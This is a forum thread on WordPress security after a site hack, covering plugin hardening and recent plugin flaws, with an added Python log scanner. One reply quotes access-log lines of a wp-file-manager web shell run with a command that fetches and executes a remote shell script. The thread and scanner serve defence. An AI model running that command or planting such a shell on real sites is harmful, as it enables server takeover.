Please Help!! I lost hope in WordPress!

In Wordfence, add restricted request for login this [login]
This way you will get rid of at least half of the xmlrpc login scanners. Or completely block xmlrpc if you don't use third-party apps.
 
I don't even know the Duplicator Pro was used for this (hacking), but yes, I'm using Wordfence, Loginizer, 2-step login, VirusTotal, Google reCAPTCHA, and I change my admin URL, daily backups, lock anyone who tries to use the word "admin" and variations, and so on.

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
 
I don't even know the Duplicator Pro was used for this (hacking), but yes, I'm using Wordfence, Loginizer, 2-step login, VirusTotal, Google reCAPTCHA, and I change my admin URL, daily backups, lock anyone who tries to use the word "admin" and variations, and so on.
Duplicator Pro is vulnerable to hacking? OMG... many people suggest this plugin. However, I use UpdraftPlus. Hope UpdraftPlus is better.
 
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
You're so polite, Babiato needs a "MVM" member badge. (most valuable member)
 
What do you all think about the file manager plugin in WordPress, which lets us edit any file from WordPress rather than accessing cPanel and editing it?

Let me answer this in a less common way:

Code:
[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1" 200 411

I personally don't trust that plugin, as it had critical flaws in the last major releases.
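
The two log lines quoted in the post above show a POST to the plugin's connector followed by a GET to a PHP file in the plugin's `lib/files/` directory carrying a `cmd` parameter. As an added example that is not part of the original post, this Python script flags that pattern in an access log; the function names, finding labels and the two benign sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches the request part of a line: [time] "METHOD target HTTP/x" status
LINE_RE = re.compile(
    r'\[(?P<time>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)'
    r'\s+HTTP/[\d.]+"\s+(?P<status>\d{3})'
)
PLUGIN = "/wp-content/plugins/wp-file-manager/"
CONNECTOR = PLUGIN + "lib/php/connector.minimal.php"
FILES_DIR = PLUGIN + "lib/files/"

def classify(line):
    """Return finding labels (assumed names) for one log line; [] if clean."""
    m = LINE_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    findings = []
    if m["method"] == "POST" and url.path == CONNECTOR:
        findings.append("connector-post")
    if url.path.startswith(FILES_DIR) and url.path.lower().endswith(".php"):
        findings.append("php-in-files-dir")
        params = parse_qs(url.query)  # percent-decodes values, '+' becomes space
        if params:
            findings.append("query-params:" + ",".join(sorted(params)))
    if findings and m["status"] == "200":
        findings.append("served-200")  # the server answered instead of blocking
    return findings

def scan(lines):
    """Return (timestamp, findings) for every line with at least one finding."""
    pairs = ((LINE_RE.search(l), classify(l)) for l in lines)
    return [(m["time"], found) for m, found in pairs if found]

# The first two lines are the ones quoted in the post (user agent dropped);
# the last two are constructed benign requests.
SAMPLE = [
    '[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453',
    '[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1" 200 411',
    '[19/Dec/2020:09:01:10 +0000] "GET /wp-login.php HTTP/1.1" 200 2310',
    '[19/Dec/2020:09:02:31 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/logo.png HTTP/1.1" 200 8120',
]

if __name__ == "__main__":
    for when, found in scan(SAMPLE):
        print(when, ", ".join(found))
```

A `served-200` finding on either pattern means the request reached the plugin, so the site should be treated as needing a file-integrity check rather than only a firewall rule.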
 
In Wordfence, add restricted request for login this [login]
This way you will get rid of at least half of the xmlrpc login scanners. Or completely block xmlrpc if you don't use third-party apps.

This is sooo important it should almost be pinned. I completely block xmlrpc. Thank you for pointing out this simple yet crucial step.
 
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Changing the WP admin URL is more likely to be hacked, says Wordfence.
 
Yes, there is news from Wordfence recently which says the Elementor free version has some problem and it affected 7M websites worldwide; maybe this is what you are facing. Check the Wordfence blog for this and immediately either remove Elementor or update it. Elementor may be causing this issue. Check it.
 
Yes, there is news from Wordfence recently which says the Elementor free version has some problem and it affected 7M websites worldwide; maybe this is what you are facing. Check the Wordfence blog for this and immediately either remove Elementor or update it. Elementor may be causing this issue. Check it.
Since he says all of his websites are affected, I doubt it's Elementor, because the vulnerability only exists when people have access to the editor. From the Wordfence blog (comments section):

"this can only be exploited by users that can access the Elementor editor. If the only users on the site are those that are already allowed to add unfiltered HTML or JavaScript, such as administrators or editors, then yes, this doesn't add any additional risk. The primary risk is for sites that have users with fewer privileges, such as contributors and authors, as this creates a larger attack surface."

Still, given the huge user base of Elementor, it's a big thing...
 
In Wordfence, add restricted request for login this [login]
This way you will get rid of at least half of the xmlrpc login scanners. Or completely block xmlrpc if you don't use third-party apps.
Hi @slvrsteele, could you please explain the real steps to do what you suggest in simple language? I feel that your tip is important, but I do not understand how to really apply it. Thank you in advance.
 
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
That's true
 